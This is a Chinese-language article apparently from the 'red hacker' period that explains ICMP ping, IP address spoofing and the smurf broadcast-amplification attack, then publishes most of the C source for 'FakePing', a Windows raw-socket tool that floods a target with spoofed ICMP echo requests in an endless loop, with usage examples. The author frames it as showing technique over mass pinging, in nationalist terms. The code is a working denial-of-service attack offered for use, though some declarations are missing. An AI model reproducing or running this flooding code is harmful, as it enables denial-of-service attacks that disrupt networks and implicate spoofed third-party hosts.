最近不少人又來號召大家一起去Ping死什么什么網站,不過從技術上來說,無論什么拒絕服務攻擊方式,都需要滿足一個條件:用最少的資源換取被攻擊者最大的消耗。像這樣大家一起去Ping不僅是奇怪的:用最大的資源換取對方最小的傷害;也是可笑的:人民戰爭大概屬于50多年前的行為了,在互聯網時代,并不是人多就能如何如何的。 我們今天是來說Ping的,Ping是通過發送ICMP報文(類型8代碼0)探尋網絡主機是否存在的一個工具,很久以前,一部分操作系統(例如win95),不能很好處理過大的Ping包,導致出現了Ping to Death的攻擊方式(用大Ping包搞垮對方或者塞滿網絡),隨著操作系統的升級,網絡帶寬的升級、計算機硬件的升級,目前,大Ping包基本上沒有很大的攻擊效果(分布式攻擊除外),如果一定要使用Ping包去攻擊別的主機,除非是利用TCP/IP協議的其他特性或者網絡拓撲結構的缺陷放大攻擊的力度(所謂正反饋) 正常情況下,Ping的流程是這樣的: 主機A發送ICMP 8,0報文給主機B 主機B回送ICMp 0,0報文給主機A 因為ICMP基于無連結,所以就給了我們可乘之機,假設現在主機A偽裝成主機C發送ICMP 8,0報文,結果會怎么樣呢?顯然,主機B會以為是主機C發送的報文而去 回應主機C,結構如下: 偽裝為主機C 錯誤的回復 這種情況下,由于主機A只需要不斷發送Ping報文而不需要處理返回的EchoReply,所以攻擊力度成倍的增加,同時實際上主機B和主機C都是被進攻的目標,而且不會留下自己的痕跡,是一種隱蔽的一石二鳥的攻擊方法。 上面的方法用SOCK_RAW偽裝IP就可以輕松實現,不過即使放大了兩倍,對于比較強壯的操作系統和較大的帶寬,也不見得有多大的效果,難道我們又來組織運動?不好吧,還是讓敵人給我們放大好了,TCP/IP中有一個概念叫做廣播,所謂廣播的意思是說有一個地址,任何局域網內的主機都會接收發往這個地址的報文(就像電臺廣播一樣),要是?難道?沒錯!如果我們往廣播地址發送一個ICMP ECHO報文(就是Ping廣播地址一下),結果會得到非常多的回應,以太網內每一個允許接收廣播報文的主機都會回應一個ICMP_ECHOREPLY,如果你想試驗,可以在unix的機器上Ping一下你局域網的廣播地址,會看到很多回應的的dup包,就是重復的應答,windows系統上不會有這樣的結果,因為微軟的Ping程序不對多個回應進行解包,收到第一個包以后就丟棄后面的了,同樣微軟的系統默認也不回應廣播地址的包,所以你最好在一個大量unix主機的局域網內測試。 說到這里,聰明的你肯定知道我想干什么了吧?嘿嘿嘿嘿,沒錯,當我們偽裝成被攻擊主機向一個廣播地址發送Ping請求的時候,所有這個廣播地址內的主機都會回應這個Ping請求,這樣,相當于是N倍的攻擊力度!(N=廣播地址內回應Ping包的主機數量) 偽裝為主機C 所有廣播主機都會錯誤的回復
使用方法是FakePing.exe FakeIP TargetIP [PacketSize],如果TargetIP是廣播地址,那么FakeIP是被攻擊目標。 源碼公布如下: typedef struct _iphdr //定義IP首部 // 定義ICMP首部 //CheckSum:計算校驗和的子函數 //FakePing主函數 |
//接受命令行參數
if (argc<3)
{
printf("FakePing by Shotgun
");
printf(" This program can do Ping-Flooding from a FakeIP
");
printf(" Using a BroadCast IP as the FakeIP will enhance the effect
");
printf("Email:
");
printf(" Shotgun@Xici.Net
");
printf("HomePage:
");
printf("http://It.Xici.Net
");
printf("http://www.Patching.Net
");
printf("USAGE:
FakePing.exe FakeSourceIp DestinationIp [PacketSize]
");
printf("Example:
");
printf(" FakePing.exe 192.168.15.23 192.168.15.255
");
printf(" FakePing.exe 192.168.15.23 192.168.15.200 6400
");
exit(0);
}
strcpy(FakeSourceIp,argv[1]);
strcpy(DestIp,argv[2]);
if (argc>3) PacketSize=atoi(argv[3]);
if (PacketSize>60000)
{
printf("Error! Packet size too big, must <60K
");
exit(0);
}
printf("Now Fake %s Ping %s using Packet size=%d bytes
",
FakeSourceIp, DestIp, PacketSize);
printf(" Ctrl+C to Quit
");
//初始化SOCK_RAW
if((ErrorCode=WSAStartup(MAKEWORD(2,1),&wsaData))!=0)
{
fprintf(stderr,"WSAStartup failed: %d
",ErrorCode);
ExitProcess(STATUS_FAILED);
}
if((SockRaw=WSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED))==INVALID_SOCKET)
{
fprintf(stderr,"WSASocket() failed: %d
",WSAGetLastError());
ExitProcess(STATUS_FAILED);
}
flag=TRUE;
//設置IP_HDRINCL以自己填充IP首部
ErrorCode=setsockopt(SockRaw,IPPROTO_IP,IP_HDRINCL,(char *)&flag,sizeof(int));
if(ErrorCode==SOCKET_ERROR)
printf("Set IP_HDRINCL Error!
");
__try
{
//設置發送超時
ErrorCode=setsockopt(SockRaw,SOL_SOCKET,SO_SNDTIMEO,(char*)&TimeOut,sizeof(TimeOut));
if (ErrorCode==SOCKET_ERROR)
{
fprintf(stderr,"Failed to set send TimeOut: %d
",WSAGetLastError());
__leave;
}
memset(&DestAddr,0,sizeof(DestAddr));
DestAddr.sin_family=AF_INET;
DestAddr.sin_addr.s_addr=inet_addr(DestIp);
//填充IP首部
ip_header.h_verlen=(4<<4 | sizeof(ip_header)/sizeof(unsigned long)); //高四位IP版本號,低四位首部長度
ip_header.total_len=htons(sizeof(IP_HEADER)+sizeof(ICMP_HEADER)); //16位總長度(字節)
ip_header.ident=1;
//16位標識
ip_header.frag_and_flags=0;
//3位標志位
ip_header.ttl=128;
//8位生存時間 TTL
ip_header.proto=IPPROTO_ICMP;
//8位協議 (TCP, UDP 或其他)
ip_header.checksum=0;
//16位IP首部校驗和
ip_header.sourceIP=inet_addr(FakeSourceIp); //32
位源IP地址
ip_header.destIP=inet_addr(DestIp);
//32位目的IP地址
//填充ICMP首部
icmp_header.i_type = 8;
icmp_header.i_code = 0;
icmp_header.i_cksum = 0;
icmp_header.i_id = 2;
icmp_header.timestamp = 999;
icmp_header.i_seq=999;
memcpy(SendBuf, &icmp_header, sizeof(icmp_header));
memset(SendBuf+sizeof(icmp_header), E, PacketSize);
icmp_header.i_cksum = checksum((USHORT *)SendBuf, sizeof(icmp_header)+PacketSize);
memcpy(SendBuf,&ip_header,sizeof(ip_header));
memcpy(SendBuf+sizeof(ip_header), &icmp_header, sizeof(icmp_header));
memset(SendBuf+sizeof(ip_header)+sizeof(icmp_header), E, PacketSize);
memset(SendBuf+sizeof(ip_header)+sizeof(icmp_header)+PacketSize, 0, 1);
//計算發送緩沖區的大小
datasize=sizeof(ip_header)+sizeof(icmp_header)+PacketSize;
ip_header.checksum=checksum((USHORT *)SendBuf,datasize);
//填充發送緩沖區
memcpy(SendBuf,&ip_header, sizeof(ip_header));
while(1)
{
Sleep(100);
printf(".");
for(counter=0;counter<1024;counter++)
{
//發送ICMP報文
ErrorCode=sendto(SockRaw,SendBuf,datasize,0,(struct sockaddr*)&DestAddr,sizeof(DestAddr));
if (ErrorCode==SOCKET_ERROR) printf("
Send Error:%d
",GetLastError());
}
}
}//End of try
__finally
{
if (SockRaw != INVALID_SOCKET) closesocket(SockRaw);
WSACleanup();
}
return 0;
}
撰寫本文的目的不是號召大家用FakePing工具去攻擊美國站點,只是想略微展示一下用技術能做到什么蠻力做不到的東西。如果說大家一起Ping是義和團喊著“刀槍不入”去對抗大炮,FakePing也只能算得上是火槍而已,而美國已經研制出了航空母艦(一個操作系統的復雜度完全可以和航母媲美),難道用大刀、長槍、火槍去對抗航母?這樣是很感人,也很悲壯,但是沒有別的方法了?我們不能回去研制自己的戰列艦?要是這次什么紅客大戰中二炮的專家們也出來參加Ping, 要是西昌的技術人員也去參加黑主頁運動,我們不亡國才怪!